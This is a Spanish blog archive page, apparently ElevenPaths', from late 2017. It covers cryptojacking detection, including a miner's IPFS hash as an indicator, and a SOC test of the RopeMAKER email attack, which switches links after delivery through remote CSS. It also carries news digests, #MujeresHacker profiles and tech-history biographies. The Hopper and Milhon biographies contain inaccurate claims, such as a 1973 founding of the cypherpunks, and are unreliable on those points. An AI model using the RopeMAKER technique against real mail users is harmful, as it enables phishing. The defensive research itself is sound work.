Wayback Machine aquí. En él se pueden identificar minadores como el que sigue, que no es detectado aún por ninguna extensión de navegador ni tampoco identificado como tal por ningún software de seguridad en el momento en que reportamos el archivo a VirusTotal. Figura 5. Líneas finales capturadas del archivo «min.js» cargado desde www.hashing.win. Se pueden observar diversas funciones de decodificación del contenido anterior. Que el procesador se ponga literalmente al 100 % de consumo de CPU es un buen indicador. Sin embargo, en el momento en el que observamos este incidente por primera vez no podía ser bloqueado si no era matando manualmente el proceso correspondiente a esa pestaña. El código fuente del Javascript cargado está ofuscado y, en este caso, la detección se ha podido realizar en relación a la aparición de la cadena sospechosa «miner.start()» que, en cualquier caso, también podría haber sido renombrada para evitar su identificación. Recomendaciones Hay que tener en cuenta que este tipo de aplicaciones no requieren que el usuario valide la tarea, por lo que es recomendable estar pendiente de la carga del procesador dado que las librerías de Javascript se podrían estar ejecutando en segundo plano. En este sentido, existen diversas extensiones de navegador que tratan de proteger al usuario. La extensión NoCoin por ejemplo (liberada bajo GPL por un desarrollador y cuyo código está disponible en Github) se encarga de avisar al usuario cuándo una página web ha intentado llevar a cabo actividades de minería conocidas. Ha sido diseñada por el desarrollador suizo Rafael Keramidas y se encuentra disponible para Chrome, Firefox y Opera. Puede ser un buen primer paso para identificar esas páginas que no deberían estar minando. Sin embargo, estos esfuerzos no son suficientes. Por ejemplo, se ha podido identificar que el minero de crypto-loot ya había sido compartido en redes P2P como IPFS con el hash QmWoAATmahA2yd5CzqfiqNmUQSzneeSESaRvxAUh8huiBe, con lo que cualquier intento de carga del archivo bien a través de la red IPFS o a través de pasarelas a la red como ipfs.io (con URL del tipo https://ipfs.io/ipfs/QmWoAATmahA2yd5CzqfiqNmUQSzneeSESaRvxAUh8huiBe) debería ser considerado también un intento sospechoso de carga. Sin embargo, es necesario puntualizar que el cálculo del identificador del fichero en IPFS es un hash. Por tanto, bastaría con añadir un espacio para generar una versión de comportamiento idéntico pero con hash completamente diferente, con lo que las medidas propuestas aquí son meramente informativas sobre las posibilidades que ofrece IPFS como canal alternativo para la distribución de estos scripts de minería una vez visto que ya se podrían estar utilizando. Por otro lado, a nivel corporativo también es interesante monitorizar este tipo de accesos. Las empresas y, especialmente, los equipos que están conectados de forma permanente son un buen objetivo para aplicaciones maliciosas que se intenten aprovechar de esta circunstancia o incluso para personal interno poco profesional que pudiera estar aprovechando los recursos energéticos de la empresa para minar a coste 0 en su propio beneficio. Una revisión de los accesos a este tipo de plataformas o el seguimiento de picos anómalos en la factura eléctrica pueden ser un buen indicador de actividad sospechosa. Mientras la capacidad de cómputo siga siendo la responsable de dar soporte tecnológico a las funcionalidades de la cadena de bloques, el riesgo del uso energético no autorizado seguirá presente. Precisamente, el hecho de que mediante estas técnicas se pueda empezar a monetizar una infección de una forma casi inmediata y, aparentemente, inocua, lo convierte en un motivo que puede alimentar la proliferación de familias de malware con estas funcionalidades que pongan el foco, especialmente, en dispositivos de los que no estamos tan pendientes. Habrá que seguir la evolución del fenómeno. Félix Brezo Equipo de Innovación y Laboratorio de ElevenPaths @febrezo felix.brezo@11paths.com
18 de diciembre de 2017
Historias de #MujeresHacker: Rosa María Castillo, experta en Investigación y Desarrollo en Telefónica
Esta semana os traemos el relato de Rosa María Castillo, una de las expertas en I+D de la compañía que lidera la parte de Telefónica Information Systems. Ella es una de las mujeres que con pasión y talento, ayuda a mejorar nuestras tecnologías día a día. Rosa María Castillo, una de las #Mujereshacker de Telefónica CDO nos cuenta su historia: Titularía mi historia de la siguiente manera: "¿Quieres crear el futuro? Aquí tienes algunas pistas." Y mis pistas o consejos personales son las que he ido reuniendo poco a poco y las que he querido agrupar y contaros desde el momento en que me dieron la oportunidad de escribir este post. ¡Vamos allá! Desde que tengo uso de razón me recuerdo muy observadora, me gustaba todo lo que tuviera que ver con descifrar enigmas, acabar puzzles y sobre todo me atraía todo lo desconocido. Sabía que me iba a convertir en una "chica de ciencias" y sabía que seguiría con paso firme mi camino hacia el sector tecnológico. Mi primera decisión importante fue ésta, la de elegir estudiar en la Universidad de Granada una Licenciatura en Informática. Recuerdo como en esa época tuve muchas dudas en el inicio, no tenía muy claro si quería estudiar Matemáticas o Informática. U na vez llegó el momento decisivo, mi elección se decantó hacia la Informática y a partir de ahí, se despejaron todas las dudas y ya no tuve ningún miedo. Para mí, el futuro está en lo desconocido y por eso, hay que animarse a descubrir caminos nuevos. Cuando me incorporé al mundo laboral, todo fueron retos al principio: despliegues de red, el mundo de las .com, proyectos innovadores, etc. Durante esa primera época y en todo mi recorrido, de entre todos los referentes que tuve y tengo, mi hermano siempre ha sido de los más importantes. En mi etapa de estudiante fue mi principal apoyo, me animó a entrar en el mundo de la Informática y se lo agradeceré siempre. Para andar todo este camino se necesita valentía pero, sobre todo rodearte de gente que quiere que llegues a lo que más deseas hacer y quiera acompañarte en esta larga trayectoria. Mis inicios fueron duros, era un mundo de chicos, aún así las 4 chicas que estábamos en clase nos titulamos y seguimos caminos diferentes. Una de ellas opositó y ahora es inspectora de educación, otra trabaja en una PyME y las otras dos trabajamos en Multinacionales. Invito a las chicas que se lo están pensando para que pidan información, que hagan talleres y que descubran el abanico de posibilidades que existen para desarrollarse como profesionales. Gracias a la constancia, el esfuerzo y las ganas de seguir aprendiendo, me doy cuenta de la cantidad de oportunidades que pueden motivar a las chicas y chicos apasionados por la tecnología. Desde mi punto de vista, los profesionales deben informar y motivar a los jóvenes ya que juegan un papel fundamental junto con los colegios y las familias. Finalmente, mi principal visión para cualquiera que quiera apostar por un camino concreto hacia la tecnología es que queda mucho por descubrir dentro de este campo todavía. Para poder triunfar en este mundo, lo que se necesita es tener una mente ordenada, un pensamiento crítico y muchas ganas de aprender. Si unimos esto con un poco de creatividad y constancia el éxito está asegurado. Si tu quieres ser hacker tienes que saber que este mundo tiene un abanico muy amplio, y ofrece oportunidades para todo aquel que quiera aportar nuevas ideas en campos tan diferentes como Informática y Derecho o Informática y Medicina. Si tienes pasión y sientes que puedes aportar mucho en este campo, no tengas miedo, sigue adelante, ¡y tu camino se irá despejando poco a poco! Rosa María Castillo Telefónica Information Systems Manager @RMCC2004 Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. Estate atento todos los viernes publicaremos un nuevo post de la serie #MujeresHacker: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica » Paula López, Data Scientist en la 4ª Plataforma de Telefónica
15 de diciembre de 2017
Grace Murray Hopper: Inventora del COBOL y del término "bug"
Ilustración realizada por Catalina Guzmán “Tú gestionas cosas. Tú lideras personas”. Grace Hopper Grace Hopper, también conocida como “ Amazing Grace”, fue la primera mujer almirante de EE.UU, ingeniera en computación, desarrolladora de softwares, y pionera en programación que contribuyó a la industria tecnológica con la creación del lenguaje de COBOL y el término “bug”. Biografía Nació el 9 de diciembre de 1906 en Nueva York y murió el 1 de enero de 1992 en Arlington County, Virginia. Estudió Matemáticas y Física en la Universidad Vassar College, que en ese momento era solo para mujeres. En 1934, se convirtió en una de las pocas mujeres con el título de Doctorado en Matemáticas. Grace Hopper, debido a la II Guerra Mundial se inscribió a la naval en 1944 y, por su especialización con los números, le asignaron el proyecto de computación de la Oficina de Artillería en la Universidad de Harvard. Durante su tiempo allí, aprendió a programar con Mark I, la calculadora automática controlada por secuencia de IBM, convirtiéndose así en la primera mujer en programar este proyecto. Con esta tecnología, Hopper, logró que la bomba atómica funcionara ya que, resolvió un cálculo que mostraba el punto exacto en el cual aplicar presión para que una esfera colapsara en sí misma. Por el hecho de ser mujer no la sacaban en las fotos grupales, a pesar de sus muchos logros. Después en 1947, trabajó en Mark II y creó métodos de validación para este lenguaje. Mientras trabaja en este proyecto creó el término “bug” o “debugging”. Una noche el ordenador mostraba error, y tras investigar qué pasaba se dieron cuenta que había una polilla en uno de los circuitos. Quitaron el insecto y lo pegaron en el cuaderno de notas del proyecto con el comentario, "Primer caso real de un "bug" encontrado". Ella continuó su trabajo en el sector de la programación y, en 1959, creó el primer recolector de lenguaje en un ordenador. Amazing Grace se dio cuenta que las computadoras no podían hablar entre ellas y abogó por cambiar del código binario, que estaba compuesto de símbolos y números, a uno que usara palabras. Hopper, llamó esta creación COBOL, lenguaje común de programación orientado a negocios y aplicaciones para archivar. Este lenguaje de programación se volvió imprescindible ya que el usuario ya no necesitaba un PhD para poder programar, acercándolo así al público. Logros Por su larga trayectoria en la naval, en 1985, Hopper logró el rango de Contraalmirante, convirtiéndose en la única mujer con el grado de Almirante de Estados Unidos. Recibió más de 40 doctorados Honoris Causa, la Medalla Wilbur Lucius Cross de Yale, el rango de Capitán en 1973 y el de Comodoro en 1983. En 1991, Grace fue galardonada con la Medalla Nacional de Tecnología, siendo otra vez más la primera mujer en recibir este honor. Durante sus años profesionales ella fue muy solicitada como oradora en eventos de informática ya que tenía un estilo animado y sus historias de guerra llamaban mucho la atención. Actualmente, le rinden homenaje con el Grace Hopper Celebration of Women in Computing, la conferencia técnica más grande de mujeres en programación. También, en 2016, nombraron el primer edificio militar con el nombre de una mujer, Hopper Hall. ¿Qué opinas sobre la brecha de género que hay en el sector tecnológico? ¡Déjanos tu comentario! Lee el resto de posts de la serie homenaje de mujeres que han creado un hito en la historia STEM: » Sheryl Sandberg: COO de Facebook y creadora del movimiento "Lean In" » Susan Kare: una pionera e influencia en la iconografía digital » Dorothy Vaughan: matemática y primera manager afroamericana de la NASA » Jude Milhon: defensora pionera de los ciberderechos » Carol Shaw: la primera mujer diseñadora y programadora de videojuegos
13 de diciembre de 2017
#CyberSecurityPulse: El Ejército de Estados Unidos lanza un programa para captar civiles en ciberseguridad
El Ejército de Estados Unidos ha aprobado un programa para reclutar expertos con experiencia en ciberseguridad directamente en el servicio en un intento de reforzar un campo en crecimiento que los líderes militares consideran vital para la seguridad nacional. Sin embargo, esta medida, aprobada por el Pentágono y el Congreso, se trata de un piloto. De momento, busca traer cinco nuevos oficiales cada año, durante cinco años. En España también han surgido varias iniciativas para contrarrestar las dificultades presupuestarias y de formación de las Fuerzas Armadas. En concreto, la última medida fue publicada el pasado mes de noviembre procedente del Mando Conjunto de Ciberdefensa por la que se esperaba contar con un grupo de expertos solamente en aquellas situaciones necesarias, pero sin ninguna remuneración a cambio. La solución no es trivial. A pesar de los esfuerzos por recolocar y capacitar a personal interno de otras áreas hacia estos puestos, no existen procedimientos formales de captación de personal civil que permitan satisfacer las necesidades de estos organismos públicos (y los que están surgiendo parece que no son lo suficientemente atractivos). En cualquier caso, este tipo de procedimientos son difícilmente compatibles con los modelos actuales de captación de personal. La realidad es que los procedimientos de selección de este tipo de perfiles podrían entrar en conflicto con la rigurosidad de los controles exigidos por determinadas habilitaciones de seguridad y que terminarían por dejar fuera a candidatos con un alto grado de especialización. Más información en Stars and Stripes Noticias destacadas El grupo MoneyTaker roba millones de bancos estadounidenses y rusos Investigadores de seguridad han descubierto un nuevo grupo de habla rusa que no había sido detectado previamente y que silenciosamente se ha dirigido a bancos, instituciones financieras y firmas legales, principalmente en los Estados Unidos, el Reino Unido y Rusia. Según la firma de seguridad Group-IB, el grupo denominado MoneyTaker se ha enfocado principalmente en sistemas de procesamiento de tarjetas, incluyendo AWS CBR (Russian Interbank System) y SWIFT (Estados Unidos). Group-IB también ha advertido que los ataques de MoneyTaker contra las organizaciones financieras parecen estar en curso y que los bancos en América Latina podrían ser su próximo objetivo. Más información en Group-IB Los autores de Orcus RAT ponen foco en los inversors de Bitcoin Según expertos de Fortinet, los autores de Orcus RAT han comenzado a apuntar a los inversores de Bitcoin con su software malicioso. La cadena de ataque comienza con mensajes de phishing que publicitan una nueva aplicación sobre un bot para Bitcoin llamado "Gunbot" desarrollado por GuntherLab. Fortinet advierte que los actores que hay detrás de Orcus RAT implementaron algunos cambios para la descarga de malware, por ejemplo, el uso de dominios typosquatting para intentar imitar foros como el de Bitcointalk. Más información en Fortinet Noticias del resto de la semana Parches en OpenSSL por cuarta vez en 2017 El proyecto OpenSSL lanzó la versión OpenSSL 1.0.2n con dos vulnerabilidades descubiertas por el investigador de Google David Benjamin. El primer problema de gravedad moderada, con CVE-2017-3737, está relacionado con un mecanismo de "estado de error" implementado desde OpenSSL 1.0.2b. El segundo, con el CVE-2017-3738, es una vulnerabilidad de desbordamiento que podría ser explotada por un atacante para acceder a las comunicaciones protegidas por TLS. Fue calificado como de baja severidad porque es muy difícil desencadenar en un escenario de ataque real. Más información en OpenSSL Un fallo en Android permite inyectar malware en aplicaciones sin alterar las firmas Millones de dispositivos Android se encuentran en peligro tras identificar una nueva vulnerabilidad crítica (CVE-2017-13156) que permite a los atacantes sobrescribir las aplicaciones legítimas instaladas en su smartphone con sus versiones maliciosas. Apodada Janus, la vulnerabilidad permite a los atacantes modificar el código de las aplicaciones de Android sin afectar a sus certificados, lo que finalmente les permitiría distribuir actualizaciones maliciosas para las aplicaciones legítimas, que se ven y funcionan igual que las aplicaciones originales. Más información en Guardsquare Keylogger preinstalado en más de 460 modelos de portátiles HP Un investigador de seguridad llamado ZwClose ha descubierto un keylogger en varias computadoras portátiles Hewlett-Packard (HP) que podría permitir registrar cada pulsación realizada en el teclado. El keylogger se encontró en el archivo SynTP.sys, una parte del driver del touchpad Synaptics que se envía con los portátiles HP, dejando más de 460 modelos de HP Notebook vulnerables. Más información en The Hacker News Otras noticias Comprometen el servicio de minería de Nicehash: 60 millones de dólares robados Más información en The Register Microsoft dejó expuesto accidentalmente el certificado de Dynamics 365 TLS y la clave privada durante al menos 100 días Más información en Security Affairs Graves fallos en los lenguajes de programación más populares que podrían exponer cualquier aplicación segura construida encima de ellos Más información en Security Affairs ¡Regístrate a la newsletter!
12 de diciembre de 2017
#CyberSecurityPulse: Las inyecciones de código y los XSS, entre las vulnerabilidades más detectadas en 2017
El Proyecto abierto de seguridad en aplicaciones web (OWASP, por sus siglas en inglés) acaba de actualizar la lista de las diez principales vulnerabilidades web por primera vez desde 2013 pero, tras revisarlo, no ha cambiado demasiado. Según esta lista, las mayores vulnerabilidades son aquellas producidos por cualquier fallo derivado de inyecciones de código y cross site scripting (XSS) siguen estando en el top ten a pesar de que estos errores hayan estado plagados en las aplicaciones web desde hace una década y media. En este sentido, el Informe de Investigaciones de brechas de seguridad (DBIR) realizado por Verizon viene a validar desde otro punto de vista estos datos. Durante 2017 se encontraron 1.935 brechas confirmadas y analizadas, y unas 571 implicaron ataques a aplicaciones web. Por otro lado, otro aspecto también a tener en cuenta es el destacado por el informe realizado por Black Duck relativo al uso de proyectos open source por parte de gran parte de las industrias. En un 96% del software comercial se ha identificado el uso de proyectos open source y se han detectado vulnerabilidades conocidas en dos tercios de estas colecciones de código. La conclusión que se extrae es que al final muchas organizaciones no realizan un seguimiento y una gestión eficaz de los proyectos open source y, como resultado, no son plenamente conscientes de los riesgos que acompañan a su uso. Los riesgos actuales evolucionan demasiado rápido, por lo que los escaneos realizados de vez en cuando se quedaron atrás. El desarrollo de software actual requiere de pruebas de seguridad continuas con el objetivo de hacer frente al enorme volumen de vulnerabilidades que se encuentran a diario. Más información en OWASP Noticias destacadas Reino Unido lanza Cyber Discovery, un programa para encontrar la próxima generación de talentos en ciberseguridad El Departamento de Medios Digitales, Cultura, Medios de Comunicación y Deportes (DCMS) de Reino Unido acaba de lanzar su programa de capacitación en ciberseguridd dirigido a jóvenes que se encuentren entre los 10 y 13 años. La iniciativa tiene como objetivo ayudar a cerrar la brecha existente de habilidades en ciberseguridad del Reino Unido aprovechando el talento joven y no descubierto con la ambición de estimular y nutrir el interés por esta rama como una futura carrera profesional. Inicialmente, se invita a los estudiantes a registrarse y trabajar a través de una herramienta de selección llamada CyberStart Assess. Los estudiantes seleccionados pasarán a otras tres etapas que luego finalizarán con expertos de la industria, y tres eventos regionales con retos en vivo donde los padres y líderes pueden ver el progreso realizado por los estudiantes. Cyber Discovery se está probando en el primer año en Inglaterra, pero se espera que se expanda a otras partes del Reino Unido durante los siguientes años. Más información en Join Cyber Discovery Alerta de Bitcoin Gold en su wallet para Windows Bitcoin Gold publicó el pasado domingo 26 de noviembre una alerta de seguridad advirtiendo que cualquiera que haya descargado el fichero que daba acceso al wallet para Windows entre el 21 de noviembre de 2017, las 09:39 UTC y el 25 de noviembre de 2017, a las 22:30 UTC, no debe usarse de ninguna manera. Cualquier usuario que llegara a utilizar dicho fichero debe tener en cuenta que debe usarse con extrema precaución, el archivo debe eliminarse, el equipo debe revisarse minuciosamente en busca de malware y confirmar que todas las criptodivisas se encuentran disponibles. De ser así, deben ser movidas hacia nuevas direcciones de inmediato. Más información en Bitcoin Gold Noticias del resto de la semana Facebook ofrecerá una herramienta para luchar contra la propaganda rusa Después de luchar contra determinados threat actores rusos para evitar la influencia a través de redes sociales durante las elecciones presidenciales de Estados Unidos, Facebook ha dicho que ofrecerá una herramienta que permitirá a los usuarios ver las páginas y anuncios creados por la Internet Research Agency (IRA) involucrados en operaciones de influencia en nombre de gobierno ruso. Más información en SC Magazine Firefox notificará a los usuarios que visiten aquellas webs que sufrieron una filtración Firefox presentará una nueva feature de seguridad para que la experiencia de los usuarios sea más segura. En este sentido, advertirá a los usuarios si visitan sitios web que han sufrido violaciones de datos. La noticia fue hecha pública por el desarrollador de Mozilla Nihanth Subramany y fue confirmada por la presencia de un repositorio de GitHub recientemente publicado titulado "Breach Alerts Prototype". El desarrollador utilizará el proyecto Have I Been Pwned como fuente de información relacionada con brechas de seguridad. Más información en GitHub Google no permitirá que software de terceros inyecte código en Chrome Para mejorar el rendimiento y reducir los bloqueos causados por el software de terceros en Windows, Google Chrome, a mediados de 2018, ya no permitirá que las aplicaciones externas ejecuten código dentro de su navegador web. En este sentido, Google ya ha anunciado su plan, pero habrá algunas excepciones con el código firmado por Microsoft, el software de accesibilidad y el software IME para inyectar código en sus navegadores. Más información en The Hacker News Otras noticias Millones de usuarios afectados por la brecha de seguridad de PayPal Más información en The Hacker News Minadores que siguen funcionando incluso después de cerrar el navegador Más información en Security Affairs Vulnerabilidad en el wallet CoinPouch para Verge Más información en Security Affairs Diferentes agentes de autenticación de RSA afectados por dos vulnerabilidades críticas Más información en SecLists ¡Regístrate a la newsletter!
5 de diciembre de 2017
Ponemos a prueba RopeMAKER, correos que cambian su contenido una vez llegan a la bandeja de entrada
¿Qué ocurriría si un correo electrónico tuviese la capacidad de cambiar el contenido de forma dinámica una vez que ya hubiese sido entregado? Esto sería un verdadero desafío para los sistemas anti-spam, habitualmente situados a nivel de MTA y que procesan los correos antes de llegar a la bandeja de entrada. También para los sistemas que se basan en reputación del remitente, análisis de adjuntos o de los enlaces contenidos en el correo. ¿Cómo podría un atacante eludir estos obstáculos que, aunque no garanticen en éxito del ataque, sí que permitirían eludir buena parte de los obstáculos a los que se puede enfrentar? Vamos a probar esta técnica con dos clientes de correo muy comunes: Apple Mail y Outlook. Buena parte de ataques a compañías y usuarios particulares comienza con un correo electrónico que aloja algún tipo de contenido fraudulento. Bien sea un fichero que alberga malware, o bien sea un enlace a un sitio web comprometido que sirve como primer punto de descarga del contenido malicioso. RopeMAKER es un tipo de ataque de correo electrónico, descubierto por Francisco Ribeiro de la compañía de seguridad Mimecast, que permite cambiar el contenido de un correo electrónico una vez entregado. Aunque no parece que la publicación de los detalles de la técnica haya tenido gran difusión mediática, nos ha parecido interesante. Este ataque podría ser utilizado en campañas de distribución de malware o phishing para engañar al usuario y a buena parte de los filtros anti-spam tradicionales. Anuncio de RopeMAKER en Twitter El TAGS (Telefónica Advanced Global SOC) de Telefónica ha querido verificar la efectividad real de este tipo de ataque con productos como Microsoft Outlook o Apple Mail, puesto que en la descripción del ataque se mencionan sin detallar especificaciones sobre cada una de las versiones. Tipos de ataque La publicación sobre ROPEMAKER indica dos tipos de ataque posibles. Ambos serían c ontrolados por un fichero CSS que se alojaría en un servidor controlado por el atacante y serviría para cambiar el contenido del correo electrónico mostrado al usuario de forma dinámica: Switch Exploit: Los enlaces y el texto malicioso van contenidos dentro del correo en una sola pieza, por lo que es fácilmente detectable por soluciones anti-spam. La URL en el recuadro rojo mostraría un enlace malicioso, pero al usuario se le presentaría en primer lugar la URL mostrada en el recuadro verde (benigna) Este sería el código CSS que, en el recuadro verde mostraría la URL benigna y al cambiar al recuadro rojo, mostraría la URL maliciosa Matrix Exploit: El texto no se encuentra referenciado directamente en el correo, por lo que es más difícil que los sistemas de seguridad detecten este tipo de ataque. El códigoen el recuadro rojo permitiría mostrar el contenido malicioso Este código CSS indica el carácter que se debe mostrar por cada identificador incluido en el correo malicioso (http://example.com/s) en este caso Aunque el tipo de ataque Switch Exploit no supone un reto para los filtros de seguridad aplicados por las compañías, la variante Matrix Exploit ha demostrado ser efectiva en algunos de los clientes de correo más comunes entre las compañías como: Microsoft Outlook 2010 o Microsoft Outlook 2013. Es importante remarcar que el correo electrónico cambiará el contenido de una URL tipo http://example.com/benign a http://example.com/malign simplemente con un cambio del fichero CSS manejado por el atacante. De forma que el atacante podría variar fácilmente los portales de phishing o distribución de malware según vayan siendo intervenidos. Veamos algunas particularidades del ataque en cada cliente de correo electrónico. RopeMAKER en Microsoft Outlook 2010 La configuración por defecto de Outlook 2010 ha demostrado ser vulnerable a este tipo de ataque. Muestra la URL maliciosa sin necesidad de aprobar la descarga externa de contenido. RopeMAKER mostrándose efectivo con la configuración por defecto de Outlook 2010 RopeMaker en Microsoft Outlook 2013 Esta versión de Outlook ha bloqueado en un primer momento el ataque y muestra un contenido sin sentido para el usuario, que impide que se vea afectado en un principio. RopeMAKER bloqueado con la configuración por defecto de Outlook 2013 Sin embargo, si el usuario desea mostrar el mensaje, (lo cual es probable si el remitente parece fiable), podría permitir la descarga de contenido externo pulsando sobre el siguiente mensaje. Mensaje advirtiendo el peligro de descargar contenido externo Si el usuario finalmente permite la descarga de contenido, se culminará el ataque y se mostrará el mensaje malicioso. Finalmente, mismo efecto que con Outlook 2010 si el usuario acepta mostrar el contenido externo RopeMAKER con Apple Mail Utilizando la configuración por defecto de Apple Mail en Mac OSX, se descarga el contenido automáticamente aunque no es capaz de procesar todas las instrucciones de la hoja de estilos CSS que mostrarían el sitio web fraudulento. RopeMAKER bloqueado en Apple Mail de Mac OSX En todo caso, es importante detallar que la URL remitida podría tener formato de enlace pero no contendría el link, por lo que el usuario tendría que copiar y pegar el contenido de la URL en un navegador para acceder a la página web. Esto reduce la posibilidad de éxito del ataque, pero no evita la posibilidad de que se utilice ingeniería social para que el usuario termine accediendo al sitio web fraudulento. ¿Existe alguna solución? Aunque actualmente no se han conocido casos de ejecución de campañas utilizando RopeMAKER y parece una técnica con mayor probabilidad de éxito en casos de spear phishing, es una modalidad interesante que debería ser tenida en cuenta tanto por especialistas en ciberseguridad como por usuarios finales. Al fin y al cabo, si un atacantepudiera cambiar el contenido de un correo electrónico ya enviado de forma dinámica, ¿por qué no añadir esta técnica a su campaña de distribución de malware para intentar maximizar sus opciones de éxito? La variante Matrix Exploit de ROPEMAKER es difícil de evitar y prevenir. Bloquear por defecto la carga de contenido externo minimiza el riesgo de ser engañado mediante un ataque de este tipo, aunque es una medida que ya se suele emplear con un éxito que no siempre es el deseado. Otra solución obvia es aplicar de forma ágil indicadores de compromiso generados por el servicio de ciberseguridad de la compañía o firmas de anti-virus con las que colabore la empresa es crucial para minimizar el riesgo de que los usuarios finales de la compañía accedan a páginas web conocidas por albergar malware o phishing. Mario de Benito Aspas Samuel Dugo Flores Telefónica Advanced Global SOC
4 de diciembre de 2017
Historias de #MujeresHacker: Paula López, Data Scientist en la 4ª Plataforma de Telefónica
Esta semana os presentamos a Paula López, experta en Data Science que disfruta el día a día diseñando y desarrollando modelos analíticos y algoritmos basados en Machine Learning e Inteligencia Artificial transformadores de datos en decisiones de negocio que mejoran la experiencia de usuario de Telefónica. Paula López, una de las #mujereshacker de Telefónica CDO nos cuenta su historia: Para mí, un hacker es un apasionad@ por crear, descubrir y desarrollar en el universo tecnológico. Ésta es una definición con la que me siento identificada desde el inicio de mi andadura en el mundo STEM. Cuando era una niña, recuerdo que me fascinaban los números, la tecnología y los rompecabezas. Ése fue el origen que me inspiró poco a poco y hoy, echando la vista atrás, me doy cuenta que siempre he tenido inquietud de demostrar y llevar a la realidad toda esa teoría escrita en los libros de mates. Sobre mí os puedo contar, que me gradué en Estadística por la Universidad de Valladolid y realicé un máster de Estadística Aplicada en la Universidad de Granada. He colaborado con la universidad en proyectos de Investigación Operativa, y anteriormente, trabajé en una Start-up como analista de modelos de inversión. Actualmente, además de mi trabajo en Telefónica, formo parte de la comunidad de software libre R de España (soy una “RLady”). Además, en este último año, he dado charlas de formación internas sobre Spark, Deep Learning y otros temas con los que trabajamos día a día y nos apasionan. Nunca he querido abandonar mi camino en la tecnología, al contrario, siempre he visto una oportunidad en aquello que estaba por descubrir y en extraer la inteligencia cognitiva del dato. Ahora lo que más me motiva es saber qué hay detrás de una simple secuencia de datos y hacerme preguntas como: ¿qué comportamiento existe en una serie de números? ¿Existe algún patrón? ¿Qué se puede obtener de ello? ¿Cómo podemos predecir qué va a pasar a partir de ahora con la información que hay hasta el momento? Cuando era pequeña, éstos eran simples juegos de adivinar qué figura falta en el grupo, o qué número sigue la serie y resulta que "de mayor" descubrí que estos juegos pueden ser muy útiles en la vida real, que, por ejemplo, se pueden utilizar para prevenir enfermedades, reaccionar a un desastre natural, predecir la delincuencia de un país, o saber cómo va a evolucionar una epidemia. Al inicio de mi recorrido, me hubiese gustado que alguien me dijera que no es un camino difícil. Siempre "se pinta" que la programación y las matemáticas es un mundo oscuro, difícil de comprender, pero en realidad es como un reto en el que, a medida que te sumerges, te hace más independiente y te hace valer más por ti misma. Es entender una realidad que cada vez es más imprescindible para la sociedad. Finalmente, uno de los elementos importantes para mí en este recorrido es tener un referente. En mi caso, ese referente siempre ha sido mi madre, que se dedicaba a la enseñanza de las matemáticas e informática. A día de hoy, me gustaría seguir transmitiendo lo que mi madre me ha ido trasmitido a mí, ya que creo que poco a poco será algo más común ver a una mujer "al volante", sobre todo porque las mujeres aportamos nuevos valores al mundo hacker, nuevas formas de pensar y nuevos enfoques. Mi consejo y motivación para las jóvenes que les gustan las mates, los rompecabezas y creen que en un futuro pueden crear tecnología es el siguiente: ¡Sigue adelante con todo lo que te entre curiosidad: ¡cuestiona, investiga, descubre y a disfrutar! Paula López Casado Telefónica Data Science 4ª Plataforma @paulalcasado paulalcasado.wordpress.com Si también eres mujer y hacker cuéntanos tu historia en mujereshacker@telefonica.com o rellena el siguiente formulario para inspirar a las más jóvenes. Queremos dar cabida a todas esas historias inspiradoras, valientes y alentadoras que recibamos. Estate atento todos los viernes publicaremos un nuevo post de la serie #MujeresHackers: » Mamá, yo quiero ser hacker » Sheila Berta, la speaker más joven en DefCON & BlackHat » Laura Iglesias, experta en ciberseguridad y hacking en Telefónica
1 de diciembre de 2017
Jude Milhon: defensora pionera de los ciberderechos
Ilustración realizada por Catalina Guzmán "Las mujeres necesitan módems” . Jude Milhon Jude Milhon o San Jude era conocida en el sector tecnológico como la santa defensora de los hackers ya que abogaba por la privacidad y el uso público de Internet. Creía firmemente que Internet debía estar disponible para todos, no solo para el Gobierno y entidades privilegiadas. Además, fue creadora del término cypherpunk, programadora, escritora y activista en la lucha de incentivar a las mujeres a formar parte del ámbito digital. Biografía Jude Milhon nació el 12 de marzo de 1939 en Washington DC y murió el 19 de julio de 2003 en San Francisco, California. Vivió la mayor parte de su adolescencia en Anderson, Indiana, donde fue encarcelada varias veces por desobediencia civil, ya que desde temprana edad fue defensora de los derechos civiles. En 1967, Milhon empezó su carrera en el mundo de la informática aprendiendo a programar con la guía Teach Yourself Fortran, lenguaje de programación por medio de las matemáticas. Era una época en la que la informática era un mundo dominado por hombres y por eso, Jude, tuvo que abrirse paso e incentivar a otras mujeres a unirse al conocimiento de la cultura cibernética. Ella animaba a otras mujeres a unirse a esta cultura ya que creía en el placer de experimentar con la tecnología, a huir de la imagen que la sociedad exigía de ellas por el hecho de ser mujeres. Para ella, el uso de la web era algo muy importante porque “cuando estás en el ciberespacio nadie sabe cuál es tu género”. San Jude fue miembro de diferentes asociaciones que defendían la privacidad digital del usuario y la responsabilidad social que conlleva su uso. Entre estas organizaciones estaba el grupo de Cypherpunks, término que unía la palabra cifra con el movimiento punk, y que Jude fundó en 1973. A través de este movimiento, defendían la privacidad y la comunicación segura, ya que entendían que nadie se las iba a proporcionar. Por eso, crearon los códigos de seguridad a través de la criptografía, comunicación secreta que trataba de garantizar la privacidad digital. En definitiva, apostaron por un mundo en el que la huella digital de cualquier usuario fuera rastreada solo si éste así lo permitía. Para ella, el 'hackeo' era "la evasión inteligente de límites impuestos, ya sea por el Gobierno, por nuestras propias habilidades o por las leyes de la física". Jude logró sobrepasar estos límites creando el primer sistema público de Internet llamado Proyecto de la Comunidad de Memoria, ya que Internet estaba limitado a pocas entidades gubernamentales e instituciones privilegiadas. Bajo esta misma filosofía y su intento de involucrar a las mujeres a usar Internet, la hacker escribió un libro llamado, “Hackeando a las personas: El libro de cabecera de las Nerd” . Con este libro ella intentó hacer del tema del hacking algo interesante para las mujeres, donde ponía de manifiesto que para ser alguien no se necesitaba un gran físico o mucha belleza, sino un buen cerebro y la mejor actitud. ¿Qué opinas sobre la brecha de género que hay en el sector tecnológico? ¡Déjanos tu comentario! Lee el resto de posts de la serie homenaje de mujeres que han creado un hito en la historia STEM: » Sheryl Sandberg: COO de Facebook y creadora del movimiento "Lean In" » Susan Kare: una pionera e influencia en la iconografía digital » Dorothy Vaughan: matemática y primera manager afroamericana de la NASA » Grace Murray Hopper: Inventora del Cobol y del término "bug" » Carol Shaw: la primera mujer diseñadora y programadora de videojuegos
29 de noviembre de 2017
